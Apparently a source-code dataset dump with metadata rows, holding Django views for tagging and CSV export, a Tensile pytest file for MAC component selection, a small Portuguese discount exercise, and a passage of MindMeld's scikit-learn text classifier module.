if request.user.has_perm('annotatetext.add_annotation'):
return annotatetext_post_annotation(request)
else:
return HttpResponseForbidden(_("Sorry, you do not have the permission to annotate."))
def search(request, lang='he'):
mutable_get = request.GET.copy()
if 'cof' in mutable_get:
del mutable_get['cof']
return render_to_response('search/search.html', RequestContext(request, {
'query': request.GET.get('q'),
'query_string': mutable_get.urlencode(),
'has_search': True,
'lang': lang,
'cx': settings.GOOGLE_CUSTOM_SEARCH,
}))
def post_details(request, post_id):
from hitcount.views import _update_hit_count
from hitcount.models import HitCount
from planet.models import Post
# update the it count
ctype = ContentType.objects.get(app_label="planet", model="post")
hitcount, created = HitCount.objects.get_or_create(content_type=ctype,
object_pk=post_id)
result = _update_hit_count(request, hitcount)
post = get_object_or_404(Post, pk=post_id)
return HttpResponseRedirect(post.url)
class RobotsView(TemplateView):
template_name = 'robots.txt'
def render_to_response(self, context, **kwargs):
return super(RobotsView, self).render_to_response(context,
content_type='text/plain', **kwargs)
class AboutView(TemplateView):
template_name = 'about.html'
class CommentsView(ListView):
model = Comment
queryset = Comment.objects.order_by("-submit_date")
paginate_by = 20
def _add_tag_to_object(user, app, object_type, object_id, tag):
ctype = ContentType.objects.get_by_natural_key(app, object_type)
(ti, created) = TaggedItem._default_manager.get_or_create(
tag=tag,
content_type=ctype,
object_id=object_id)
action.send(user, verb='tagged', target=ti, description='%s' % (tag.name))
url = reverse('tag-detail', kwargs={'slug': tag.name})
return HttpResponse("{'id':%d, 'name':'%s', 'url':'%s'}" % (tag.id,
tag.name,
url))
@login_required
def add_tag_to_object(request, app, object_type, object_id):
if request.method == 'POST' and 'tag_id' in request.POST: # If the form has been submitted...
tag = get_object_or_404(Tag,pk=request.POST['tag_id'])
return _add_tag_to_object(request.user, app, object_type, object_id, tag)
return HttpResponseNotAllowed(['POST'])
@login_required
def remove_tag_from_object(request, app, object_type, object_id):
ctype = ContentType.objects.get_by_natural_key(app, object_type)
if request.method == 'POST' and 'tag_id' in request.POST: # If the form has been submitted...
tag = get_object_or_404(Tag,pk=request.POST['tag_id'])
ti = TaggedItem._default_manager.filter(tag=tag, content_type=ctype, object_id=object_id)
if len(ti)==1:
logger.debug('user %s is deleting tagged item %d' % (request.user.username, ti[0].id))
ti[0].delete()
action.send(request.user,verb='removed-tag', target=ti[0], description='%s' % (tag.name))
else:
logger.debug('user %s tried removing tag %d from object, but failed, because len(tagged_items)!=1' % (request.user.username, tag.id))
return HttpResponse("{'id':%d,'name':'%s'}" % (tag.id,tag.name))
@permission_required('tagging.add_tag')
def create_tag_and_add_to_item(request, app, object_type, object_id):
if request.method == 'POST' and 'tag' in request.POST:
tag = request.POST['tag'].strip()
msg = "user %s is creating tag %s on object_type %s and object_id %s".encode('utf8') % (request.user.username, tag, object_type, object_id)
logger.info(msg)
notify_responsible_adult(msg)
if len(tag)<3:
return HttpResponseBadRequest()
tags = Tag.objects.filter(name=tag)
if not tags:
try:
tag = Tag.objects.create(name=tag)
except Exception:
logger.warn("can't create tag %s" % tag)
return HttpResponseBadRequest()
if len(tags)==1:
tag = tags[0]
if len(tags)>1:
logger.warn("More than 1 tag: %s" % tag)
return HttpResponseBadRequest()
return _add_tag_to_object(request.user, app, object_type, object_id, tag)
else:
return HttpResponseNotAllowed(['POST'])
def calculate_cloud_from_models(*args):
from tagging.models import Tag
cloud = Tag._default_manager.cloud_for_model(args[0])
for model in args[1:]:
for tag in Tag._default_manager.cloud_for_model(model):
if tag in cloud:
cloud[cloud.index(tag)].count+=tag.count
else:
cloud.append(tag)
return tagging.utils.calculate_cloud(cloud)
class TagList(ListView):
model = Tag
template_name = 'auxiliary/tag_list.html'
def get_queryset(self):
return Tag.objects.all()
def get_context_data(self, **kwargs):
context = super(TagList, self).get_context_data(**kwargs)
tags_cloud = cache.get('tags_cloud', None)
if not tags_cloud:
tags_cloud = calculate_cloud_from_models(Vote,Bill,CommitteeMeeting)
tags_cloud.sort(key=lambda x:x.name)
cache.set('tags_cloud', tags_cloud, settings.LONG_CACHE_TIME)
context['tags_cloud'] = tags_cloud
return context
class TagDetail(DetailView):
model = Tag
template_name = 'auxiliary/tag_detail.html'
slug_field = 'name'
def create_tag_cloud(self, tag, limit=30, bills=None, votes=None,
cms=None):
try:
mk_limit = int(self.request.GET.get('limit', limit))
except ValueError:
mk_limit = limit
if bills is None:
bills = TaggedItem.objects.get_by_model(Bill, tag)\
.prefetch_related('proposers')
if votes is None:
votes = TaggedItem.objects.get_by_model(Vote, tag)\
.prefetch_related('votes')
if cms is None:
cms = TaggedItem.objects.get_by_model(CommitteeMeeting, tag)\
.prefetch_related('mks_attended')
mk_taggeds = [(b.proposers.all(), b.stage_date) for b in bills]
mk_taggeds += [(v.votes.all(), v.time.date()) for v in votes]
mk_taggeds += [(cm.mks_attended.all(), cm.date) for cm in cms]
current_k_start = Knesset.objects.current_knesset().start_date
d = {}
d_previous = {}
for tagged, date in mk_taggeds:
if date and (date > current_k_start):
for p in tagged:
d[p] = d.get(p, 0) + 1
else:
for p in tagged:
d_previous[p] = d.get(p, 0) + 1
mks = dict(sorted(d.items(), lambda x, y: cmp(y[1], x[1]))[:mk_limit])
for mk in mks:
mk.count = d[mk]
mks = tagging.utils.calculate_cloud(mks)
mks_previous = dict(sorted(d_previous.items(),
lambda x, y: cmp(y[1], x[1]))[:mk_limit])
for mk in mks_previous:
mk.count = d_previous[mk]
mks_previous = tagging.utils.calculate_cloud(mks_previous)
return mks, mks_previous
def get(self, *args, **kwargs):
tag = self.get_object()
ts = TagSynonym.objects.filter(synonym_tag=tag)
if len(ts) > 0:
proper = ts[0].tag
url = reverse('tag-detail', kwargs={'slug': proper.name})
return HttpResponsePermanentRedirect(url)
else:
return super(TagDetail, self).get(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(TagDetail, self).get_context_data(**kwargs)
tag = context['object']
bills_ct = ContentType.objects.get_for_model(Bill)
bill_ids = TaggedItem.objects.filter(
tag=tag,
content_type=bills_ct).values_list('object_id', flat=True)
bills = Bill.objects.filter(id__in=bill_ids)
context['bills'] = bills
votes_ct = ContentType.objects.get_for_model(Vote)
vote_ids = TaggedItem.objects.filter(
tag=tag, content_type=votes_ct).values_list('object_id', flat=True)
votes = Vote.objects.filter(id__in=vote_ids)
context['votes'] = votes
cm_ct = ContentType.objects.get_for_model(CommitteeMeeting)
cm_ids = TaggedItem.objects.filter(
tag=tag, content_type=cm_ct).values_list('object_id', flat=True)
cms = CommitteeMeeting.objects.filter(id__in=cm_ids)
context['cms'] = cms
(context['members'],
context['past_members']) = self.create_tag_cloud(tag)
return context
class CsvView(BaseListView):
filename = None
list_display = None
def dispatch(self, request):
if None in (self.filename, self.list_display, self.model):
raise Http404()
self.request = request
response = HttpResponse(mimetype='text/csv')
response['Content-Disposition'] = \
'attachment; filename="{}"'.format(self.filename)
object_list = self.get_queryset()
self.prepare_csv_for_utf8(response)
writer = csv.writer(response, dialect='excel')
writer.writerow([title.encode('utf8')
for _, title in self.list_display])
for obj in object_list:
row = [self.get_display_attr(obj, attr)
for attr, _ in self.list_display]
writer.writerow([unicode(item).encode('utf8') for item in row])
return response
def get_display_attr(self, obj, attr):
display_attr = getattr(self, attr, None)
if display_attr is not None:
if callable(display_attr):
display_attr = display_attr(obj,attr)
else:
display_attr = getattr(obj, attr)
if callable(display_attr):
display_attr = display_attr()
if display_attr is None:
return ""
return display_attr
@staticmethod
def prepare_csv_for_utf8(fileobj):
fileobj.write('\xef\xbb\xbf')
class GetMoreView(ListView):
def get_context_data(self, **kwargs):
ctx = super(GetMoreView, self).get_context_data(**kwargs)
try:
initial = int(self.request.GET.get('initial', '0'))
except ValueError:
initial = 0
if ctx['page_obj'].number > 1 or initial >= self.paginate_by - 1:
initial = 0
ctx['object_list'] = ctx['object_list'][initial:]
return ctx
def render_to_response(self, context, **response_kwargs):
tmpl_response = super(GetMoreView, self).render_to_response(
context, **response_kwargs).render()
page = context['page_obj']
result = {
'content': tmpl_response.content,
'total': context['paginator'].num_pages,
'current': page.number,
'has_next': page.has_next(),
}
return HttpResponse(json.dumps(result, ensure_ascii=False),
content_type='application/json')
def untagged_objects(request):
return render_to_response('auxiliary/untagged_objects.html', {
'cms': CommitteeMeeting.objects.filter_and_order(tagged=['false'])[:100],
'cms_count': CommitteeMeeting.objects.filter_and_order(tagged=['false']).count(),
'bills': Bill.objects.filter_and_order(tagged='false')[:100],
'bill_count': Bill.objects.filter_and_order(tagged='false').count(),
'votes': Vote.objects.filter_and_order(tagged='false')[:100],
'vote_count': Vote.objects.filter_and_order(tagged='false').count(),
},
context_instance=RequestContext(request))
| true | true |
f7fa41252ca5286426a644c2a0f58379888142d3 | 7,037 | py | Python | Tensile/Tests/unit/test_Component.py | ufo2011/Tensile | f8fe37a2708f757a7e97171ca9e40c7581bd40dd | [
"MIT"
] | 116 | 2017-06-29T08:52:55.000Z | 2022-03-25T03:01:43.000Z | Tensile/Tests/unit/test_Component.py | ufo2011/Tensile | f8fe37a2708f757a7e97171ca9e40c7581bd40dd | [
"MIT"
] | 431 | 2017-07-19T16:29:54.000Z | 2022-03-31T19:40:12.000Z | Tensile/Tests/unit/test_Component.py | ufo2011/Tensile | f8fe37a2708f757a7e97171ca9e40c7581bd40dd | [
"MIT"
] | 107 | 2017-10-14T01:38:41.000Z | 2022-03-07T08:49:09.000Z | ################################################################################
# Copyright 2020 Advanced Micro Devices, Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell cop-
# ies of the Software, and to permit persons to whom the Software is furnished
# to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IM-
# PLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNE-
# CTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
################################################################################
import pytest
import Tensile.Component as Component
import Tensile.Components as Components
from Tensile.DataType import DataType
def test_PartialMatch():
a = {'foo': True,
'bar': 25,
'baz': {'Enabled': True,
'Debug': False}}
b = {'foo': True}
assert Component.PartialMatch(b, a)
assert not Component.PartialMatch(a, b)
assert not Component.PartialMatch({'foo': False}, a)
assert not Component.PartialMatch({'baz': {"Enabled": False}}, a)
assert Component.PartialMatch({'baz': {"Enabled": True}}, a)
assert not Component.PartialMatch({'baz': {"Error": True}}, a)
assert not Component.PartialMatch({'bar': lambda x: x < 10}, a)
assert Component.PartialMatch({'bar': lambda x: x > 10}, a)
shouldMatch = lambda obj: obj['foo'] and obj['bar'] > 20
shouldNotMatch = lambda obj: obj['foo'] and obj['bar'] < 20
assert Component.PartialMatch(shouldMatch, a)
assert not Component.PartialMatch(shouldNotMatch, a)
class MockWriter:
def __init__(self, **kwargs):
defaultArgs = {'endLine': '\n'}
args = {}
args.update(defaultArgs)
args.update(kwargs)
for k,v in args.items():
setattr(self, k, v)
@pytest.fixture
def vega10():
return {
'asmCaps': {'v_fma_f16': False,
'v_pk_fma_f16': True,
'v_dot2c_f32_f16': False,
'v_dot2_f32_f16': False,
'v_dot4c_i32_i8': False,
'v_dot4_i32_i8': False,
"v_mad_mix_f32": True,
"v_fma_mix_f32": False,
"v_mac_f32": True,
"v_fma_f32": True,
"v_fmac_f32": False,
}
}
@pytest.fixture
def navi10():
return {
'asmCaps': {'v_fma_f16': True,
'v_pk_fma_f16': False,
'v_dot2c_f32_f16': False,
'v_dot2_f32_f16': False,
'v_dot4c_i32_i8': False,
'v_dot4_i32_i8': False,
"v_mad_mix_f32": False,
"v_fma_mix_f32": True,
"v_mac_f32": True,
"v_fma_f32": True,
"v_fmac_f32": True}
}
@pytest.fixture
def navi12():
return {
'asmCaps': {'v_fma_f16': False,
'v_pk_fma_f16': False,
'v_dot2c_f32_f16': True,
'v_dot2_f32_f16': True,
'v_dot4c_i32_i8': True,
'v_dot4_i32_i8': True,
"v_mad_mix_f32": False,
"v_fma_mix_f32": True,
"v_mac_f32": True,
"v_fma_f32": True,
"v_fmac_f32": True}
}
@pytest.fixture
def f16():
return {
'kernel': {"ProblemType": {"DataType": DataType(DataType.half),
"HighPrecisionAccumulate": False},
"AggressivePerfMode": True,
"LocalDotLayout": 1,
"InnerUnroll": 1,
"ThreadTile0": 4,
"ThreadTile1": 4}
}
@pytest.fixture
def f16_hpa():
return {
'kernel': {"ProblemType": {"DataType": DataType(DataType.half),
"HighPrecisionAccumulate": True},
"AggressivePerfMode": True,
"LocalDotLayout": 1,
"InnerUnroll": 1,
"ThreadTile0": 4,
"ThreadTile1": 4}
}
@pytest.fixture
def f16_hpa_ldl():
return {
'kernel': {"ProblemType": {"DataType": DataType(DataType.half),
"HighPrecisionAccumulate": True},
"AggressivePerfMode": True,
"LocalDotLayout": 2,
"InnerUnroll": 2,
"ThreadTile0": 4,
"ThreadTile1": 4}
}
#navi = MockWriter(asmCaps = {'v_fma_f16': True,
# 'v_pk_fma_f16': False},
# kernel = {"ProblemType": {"DataType": DataType(DataType.half),
# "HighPrecisionAccumulate": False},
# "AggressivePerfMode": True,
# "ThreadTile0": 4,
# "ThreadTile1": 4},
# endLine = '\n')
def test_find(navi10, f16):
writer = MockWriter(**navi10, **f16)
found = Component.MAC.find(writer)
assert isinstance(found, Components.MAC_F16.FMA_F16_NonPacked)
def test_find2(vega10, f16_hpa):
writer = MockWriter(**vega10, **f16_hpa)
found = Component.MAC.find(writer)
assert isinstance(found, Components.MAC_F16_HPA.FMA_F16_HPA_MAD_MIX)
def test_MAC_F16_FMA_NonPacked(navi10, f16):
writer = MockWriter(**navi10, **f16)
found = Component.MAC.find(writer)
kernelText = found(writer, 2, 4)
print(kernelText)
def test_componentPath():
assert Components.MAC_F16.FMA_F16_NonPacked.componentPath() == ["Component", "MAC", "FMA_F16_NonPacked"]
def test_find_macs(useGlobalParameters, f16, f16_hpa, f16_hpa_ldl):
    """Every supported ISA should provide a MAC component for each fp16 variant,
    except high-precision accumulate on gfx803.
    """
    # `params` instead of `globals`: the original shadowed the builtin.
    with useGlobalParameters() as params:
        for dtype in [f16, f16_hpa, f16_hpa_ldl]:
            for arch in params["SupportedISA"]:
                writer = MockWriter(asmCaps=params["AsmCaps"][arch],
                                    archCaps=params["ArchCaps"][arch],
                                    **dtype)
                found = Component.MAC.find(writer, True)
                # No HPA on 803, every other combination should work though.
                if arch != (8, 0, 3) or (dtype != f16_hpa and dtype != f16_hpa_ldl):
                    assert isinstance(found, Component.MAC)
                    print(dtype, arch, found)
| 36.46114 | 114 | 0.554356 | true | true | |
f7fa41af81c49e6f6e970ef316571ea89fcdd869 | 240 | py | Python | pacote-download/d012 - valor do produto de dar 5% desconto.py | Carlos-DOliveira/cursoemvideo-python3 | 4546c8a7360155243e2f7ecbbb80c57868f770a2 | [
"MIT"
] | null | null | null | pacote-download/d012 - valor do produto de dar 5% desconto.py | Carlos-DOliveira/cursoemvideo-python3 | 4546c8a7360155243e2f7ecbbb80c57868f770a2 | [
"MIT"
] | null | null | null | pacote-download/d012 - valor do produto de dar 5% desconto.py | Carlos-DOliveira/cursoemvideo-python3 | 4546c8a7360155243e2f7ecbbb80c57868f770a2 | [
"MIT"
] | null | null | null | ''' 012 Faça um algoritmo que leia o preço de um produto e mostre seu novo preço, com 5% de desconto'''
valor = float(input('Digite o valor do protudo: R$ '))
print(f'O Valor do produto com 5% de desconto é {valor - (valor * 5)/100:.2f}') | 48 | 103 | 0.683333 |
valor = float(input('Digite o valor do protudo: R$ '))
print(f'O Valor do produto com 5% de desconto é {valor - (valor * 5)/100:.2f}') | true | true |
f7fa43056e7a13c78632ab592112a94dfe59e9d5 | 17,688 | py | Python | mindmeld/models/text_models.py | BuildJet/mindmeld | 615e40288695990188adb15b9952484a967e94a8 | [
"Apache-2.0"
] | null | null | null | mindmeld/models/text_models.py | BuildJet/mindmeld | 615e40288695990188adb15b9952484a967e94a8 | [
"Apache-2.0"
] | 1 | 2021-03-16T12:47:59.000Z | 2021-03-16T12:47:59.000Z | mindmeld/models/text_models.py | isabella232/mindmeld | 82b063b21d6012b36ba2a4321edfa56b8c4b8c90 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015 Cisco Systems, Inc. and others. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module contains all code required to perform multinomial classification
of text.
"""
import logging
import operator
import random
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction import DictVectorizer
from sklearn.feature_selection import SelectFromModel, SelectPercentile
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import LabelEncoder as SKLabelEncoder
from sklearn.preprocessing import MaxAbsScaler, StandardScaler
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from .helpers import (
CHAR_NGRAM_FREQ_RSC,
QUERY_FREQ_RSC,
WORD_FREQ_RSC,
WORD_NGRAM_FREQ_RSC,
register_model,
)
from .model import EvaluatedExample, Model, StandardModelEvaluation
_NEG_INF = -1e10
# classifier types
LOG_REG_TYPE = "logreg"
DECISION_TREE_TYPE = "dtree"
RANDOM_FOREST_TYPE = "rforest"
SVM_TYPE = "svm"
SUPER_LEARNER_TYPE = "super-learner"
BASE_MODEL_TYPES = [LOG_REG_TYPE, DECISION_TREE_TYPE, RANDOM_FOREST_TYPE, SVM_TYPE]
# default model scoring type
ACCURACY_SCORING = "accuracy"
logger = logging.getLogger(__name__)
class TextModel(Model):
    """A machine-learned text classifier built on scikit-learn estimators.

    Combines feature extraction into dicts, vectorization (DictVectorizer),
    optional feature scaling/selection, and one of several sklearn
    classifiers (logreg, dtree, rforest, svm) behind the generic MindMeld
    ``Model`` interface.
    """

    def __init__(self, config):
        """Initializes the text model from a model config.

        Args:
            config (ModelConfig): the model configuration
        """
        super().__init__(config)
        # Maps class labels to/from sequential integer ids for sklearn
        self._class_encoder = SKLabelEncoder()
        # Maps extracted feature dicts to sparse numeric vectors
        self._feat_vectorizer = DictVectorizer()
        # Optional feature selection/scaling, driven by model settings
        self._feat_selector = self._get_feature_selector()
        self._feat_scaler = self._get_feature_scaler()
        # NOTE(review): the meta/base-classifier attributes below are not
        # referenced elsewhere in this class — presumably reserved for a
        # stacked ("super-learner") setup; confirm before removing.
        self._meta_type = None
        self._meta_feat_vectorizer = DictVectorizer(sparse=False)
        self._base_clfs = {}
        self.cv_loss_ = None
        self.train_acc_ = None

    def __getstate__(self):
        """Returns the information needed to pickle an instance of this class.

        By default, pickling removes attributes with names starting with
        underscores. This overrides that behavior.
        """
        attributes = self.__dict__.copy()
        # Only keep the frequency/query resources; other resources are
        # dropped from the pickled state.
        attributes["_resources"] = {
            rname: self._resources.get(rname, {})
            for rname in [
                WORD_FREQ_RSC,
                QUERY_FREQ_RSC,
                WORD_NGRAM_FREQ_RSC,
                CHAR_NGRAM_FREQ_RSC,
            ]
        }
        return attributes

    def _get_model_constructor(self):
        """Returns the class of the actual underlying model"""
        classifier_type = self.config.model_settings["classifier_type"]
        try:
            return {
                LOG_REG_TYPE: LogisticRegression,
                DECISION_TREE_TYPE: DecisionTreeClassifier,
                RANDOM_FOREST_TYPE: RandomForestClassifier,
                SVM_TYPE: SVC,
            }[classifier_type]
        except KeyError as e:
            msg = "{}: Classifier type {!r} not recognized"
            raise ValueError(msg.format(self.__class__.__name__, classifier_type)) from e

    def _get_cv_scorer(self, selection_settings):
        """
        Returns the scorer to use based on the selection settings and classifier type,
        defaulting to accuracy.
        """
        return selection_settings.get("scoring", ACCURACY_SCORING)

    def evaluate(self, examples, labels):
        """Evaluates a model against the given examples and labels

        Args:
            examples: A list of examples to predict
            labels: A list of expected labels

        Returns:
            ModelEvaluation: an object containing information about the \
                evaluation
        """
        # TODO: also expose feature weights?
        predictions = self.predict_proba(examples)

        # Create a model config object for the current effective config (after param selection)
        config = self._get_effective_config()
        evaluations = [
            EvaluatedExample(
                e, labels[i], predictions[i][0], predictions[i][1], config.label_type
            )
            for i, e in enumerate(examples)
        ]

        model_eval = StandardModelEvaluation(config, evaluations)
        return model_eval

    def fit(self, examples, labels, params=None):
        """Trains this model.

        This method inspects instance attributes to determine the classifier
        object and cross-validation strategy, and then fits the model to the
        training examples passed in.

        Args:
            examples (list): A list of examples.
            labels (list): A parallel list to examples. The gold labels
                for each example.
            params (dict, optional): Parameters to use when training. Parameter
                selection will be bypassed if this is provided

        Returns:
            (TextModel): Returns self to match classifier scikit-learn \
                interfaces.
        """
        params = params or self.config.params
        skip_param_selection = params is not None or self.config.param_selection is None

        # Shuffle to prevent order effects
        indices = list(range(len(labels)))
        random.shuffle(indices)
        examples = [examples[i] for i in indices]
        labels = [labels[i] for i in indices]

        distinct_labels = set(labels)
        # With fewer than two classes there is nothing to learn; note that
        # in this case self._clf is never set.
        if len(set(distinct_labels)) <= 1:
            return self

        # Extract features and classes
        y = self._label_encoder.encode(labels)
        X, y, groups = self.get_feature_matrix(examples, y, fit=True)

        if skip_param_selection:
            self._clf = self._fit(X, y, params)
            self._current_params = params
        else:
            # run cross validation to select params
            best_clf, best_params = self._fit_cv(X, y, groups)
            self._clf = best_clf
            self._current_params = best_params

        return self

    def select_params(self, examples, labels, selection_settings=None):
        """Runs cross-validated parameter selection and keeps the best estimator.

        Args:
            examples (list): A list of examples.
            labels (list): A parallel list of gold labels.
            selection_settings (dict, optional): Overrides for the parameter
                selection settings from the model config.

        Returns:
            (dict): The selected parameters.
        """
        y = self._label_encoder.encode(labels)
        X, y, groups = self.get_feature_matrix(examples, y, fit=True)
        clf, params = self._fit_cv(X, y, groups, selection_settings)
        self._clf = clf
        return params

    def _fit(self, examples, labels, params=None):
        """Trains a classifier without cross-validation.

        Args:
            examples (numpy.matrix): The feature matrix for a dataset.
            labels (numpy.array): The target output values.
            params (dict): Parameters of the classifier
        """
        params = self._convert_params(params, labels, is_grid=False)
        model_class = self._get_model_constructor()
        params = self._clean_params(model_class, params)
        return model_class(**params).fit(examples, labels)

    def predict(self, examples, dynamic_resource=None):
        """Predicts a label for each example.

        Args:
            examples (list): A list of examples to predict.
            dynamic_resource (dict, optional): A dynamic resource to aid NLP inference.

        Returns:
            The decoded predicted labels, parallel to ``examples``.
        """
        X, _, _ = self.get_feature_matrix(examples, dynamic_resource=dynamic_resource)
        y = self._clf.predict(X)
        predictions = self._class_encoder.inverse_transform(y)
        return self._label_encoder.decode(predictions)

    def predict_proba(self, examples, dynamic_resource=None):
        """Predicts class probabilities for each example.

        Args:
            examples (list): A list of examples to predict.
            dynamic_resource (dict, optional): A dynamic resource to aid NLP inference.

        Returns:
            (list of tuple): For each example, ``(top_label, {label: probability})``.
        """
        X, _, _ = self.get_feature_matrix(examples, dynamic_resource=dynamic_resource)
        return self._predict_proba(X, self._clf.predict_proba)

    def predict_log_proba(self, examples, dynamic_resource=None):
        """Predicts class log-probabilities for each example.

        Args:
            examples (list): A list of examples to predict.
            dynamic_resource (dict, optional): A dynamic resource to aid NLP inference.

        Returns:
            (list of tuple): For each example, ``(top_label, {label: log_probability})``,
                with ``-inf`` values clamped to a large negative constant.
        """
        X, _, _ = self.get_feature_matrix(examples, dynamic_resource=dynamic_resource)
        predictions = self._predict_proba(X, self._clf.predict_log_proba)

        # JSON can't reliably encode infinity, so replace it with large number
        # NOTE(review): np.Infinity was removed in NumPy 2.0; np.inf is the
        # portable spelling — confirm against the pinned numpy version.
        for row in predictions:
            _, probas = row
            for label, proba in probas.items():
                if proba == -np.Infinity:
                    probas[label] = _NEG_INF
        return predictions

    def view_extracted_features(self, example, dynamic_resource=None):
        """Returns the raw feature dict extracted for a single example."""
        return self._extract_features(
            example, dynamic_resource=dynamic_resource, tokenizer=self.tokenizer
        )

    def _get_feature_weight(self, feat_name, label_class):
        """Retrieves the feature weight from the coefficient matrix. If there are only two
        classes, the feature vector is actually collapsed into one so we need some logic to
        handle that case.

        Args:
            feat_name (str) : The feature name
            label_class (int): The index of the label

        Returns:
            (ndarray float): The ndarray with a single float element
        """
        if len(self._class_encoder.classes_) == 2 and label_class >= 1:
            return np.array([0.0])
        else:
            return self._clf.coef_[
                label_class, self._feat_vectorizer.vocabulary_[feat_name]
            ]

    def inspect(self, example, gold_label=None, dynamic_resource=None):
        """This class takes an example and returns a 2D list for every feature with feature
        name, feature value, feature weight and their product for the predicted label. If gold
        label is passed in, we will also include the feature value and weight for the gold
        label and returns the log probability of the difference.

        Args:
            example (Query): The query to be predicted
            gold_label (str): The gold label for this string
            dynamic_resource (dict, optional): A dynamic resource to aid NLP inference

        Returns:
            (list of lists): A 2D array that includes every feature, their value, weight and \
                probability
        """
        # Inspection reads self._clf.coef_, which only LogisticRegression
        # exposes in the form expected here.
        if not isinstance(self._clf, LogisticRegression):
            logging.warning(
                "Currently inspection is only available for Logistic Regression Model"
            )
            return []

        try:
            gold_class = self._class_encoder.transform([gold_label])
        except ValueError:
            logger.warning("Unable to decode label `%s`", gold_label)
            gold_class = None

        pred_label = self.predict([example], dynamic_resource=dynamic_resource)[0]
        pred_class = self._class_encoder.transform([pred_label])
        features = self._extract_features(
            example, dynamic_resource=dynamic_resource, tokenizer=self.tokenizer
        )

        logging.info("Predicted: %s.", pred_label)

        if gold_class is None:
            columns = ["Feature", "Value", "Pred_W({0})".format(pred_label), "Pred_P"]
        else:
            columns = [
                "Feature",
                "Value",
                "Pred_W({0})".format(pred_label),
                "Pred_P",
                "Gold_W({0})".format(gold_label),
                "Gold_P",
                "Diff",
            ]
            logging.info("Gold: %s.", gold_label)
        inspect_table = [columns]
        # Get all active features sorted alphabetically by name
        features = sorted(features.items(), key=operator.itemgetter(0))
        for feature in features:
            feat_name = feature[0]
            feat_value = feature[1]

            # Features we haven't seen before won't be in our vectorizer
            # e.g., an exact match feature for a query we've never seen before
            if feat_name not in self._feat_vectorizer.vocabulary_:
                continue
            weight = self._get_feature_weight(feat_name, pred_class)
            product = feat_value * weight
            if gold_class is None:
                row = [
                    feat_name,
                    round(feat_value, 4),
                    weight.round(4),
                    product.round(4),
                    "-",
                    "-",
                    "-",
                ]
            else:
                gold_w = self._get_feature_weight(feat_name, gold_class)
                gold_p = feat_value * gold_w
                diff = gold_p - product
                row = [
                    feat_name,
                    round(feat_value, 4),
                    weight.round(4),
                    product.round(4),
                    gold_w.round(4),
                    gold_p.round(4),
                    diff.round(4),
                ]
            inspect_table.append(row)
        return inspect_table

    def _predict_proba(self, X, predictor):
        """Applies ``predictor`` to the feature matrix and decodes the output.

        Args:
            X: The already-vectorized feature matrix.
            predictor (callable): ``self._clf.predict_proba`` or
                ``self._clf.predict_log_proba``.

        Returns:
            (list of tuple): For each row, ``(top_label, {label: score})``.
        """
        predictions = []
        for row in predictor(X):
            probabilities = {}
            top_class = None
            for class_index, proba in enumerate(row):
                raw_class = self._class_encoder.inverse_transform([class_index])[0]
                decoded_class = self._label_encoder.decode([raw_class])[0]
                probabilities[decoded_class] = proba
                # Track the arg-max label while decoding
                if proba > probabilities.get(top_class, -1.0):
                    top_class = decoded_class
            predictions.append((top_class, probabilities))
        return predictions

    def get_feature_matrix(self, examples, y=None, fit=False, dynamic_resource=None):
        """Transforms a list of examples into a feature matrix.

        Args:
            examples (list): The examples.
            y (array-like, optional): Encoded labels (required when ``fit`` is True).
            fit (bool, optional): Whether to fit the vectorizer/scaler/selector.
            dynamic_resource (dict, optional): A dynamic resource to aid NLP inference.

        Returns:
            (tuple): tuple containing:

                * (numpy.matrix): The feature matrix.
                * (numpy.array): The (possibly re-encoded) labels.
                * (list): The group labels for examples.
        """
        groups = []
        feats = []
        for idx, example in enumerate(examples):
            feats.append(
                self._extract_features(example, dynamic_resource, self.tokenizer)
            )
            groups.append(idx)

        X, y = self._preprocess_data(feats, y, fit=fit)
        return X, y, groups

    def _preprocess_data(self, X, y=None, fit=False):
        """Vectorizes (and optionally scales/selects) raw feature dicts.

        Args:
            X (list of dict): Extracted feature dicts, one per example.
            y (array-like, optional): Encoded labels; used when ``fit`` is True.
            fit (bool): If True, fit the class encoder, vectorizer, scaler and
                selector before transforming; otherwise only transform.

        Returns:
            (tuple): The transformed feature matrix and labels.
        """
        if fit:
            y = self._class_encoder.fit_transform(y)
            X = self._feat_vectorizer.fit_transform(X)
            if self._feat_scaler is not None:
                X = self._feat_scaler.fit_transform(X)
            if self._feat_selector is not None:
                X = self._feat_selector.fit_transform(X, y)
        else:
            X = self._feat_vectorizer.transform(X)
            if self._feat_scaler is not None:
                X = self._feat_scaler.transform(X)
            if self._feat_selector is not None:
                X = self._feat_selector.transform(X)

        return X, y

    def _convert_params(self, param_grid, y, is_grid=True):
        """
        Convert the params from the style given by the config to the style
        passed in to the actual classifier.

        Args:
            param_grid (dict): lists of classifier parameter values, keyed by parameter name
            y (array-like): encoded labels, used to derive balanced class weights
            is_grid (bool): whether param_grid holds lists of candidate values
                (grid search) or single values

        Returns:
            (dict): revised param_grid
        """
        if "class_weight" in param_grid:
            raw_weights = (
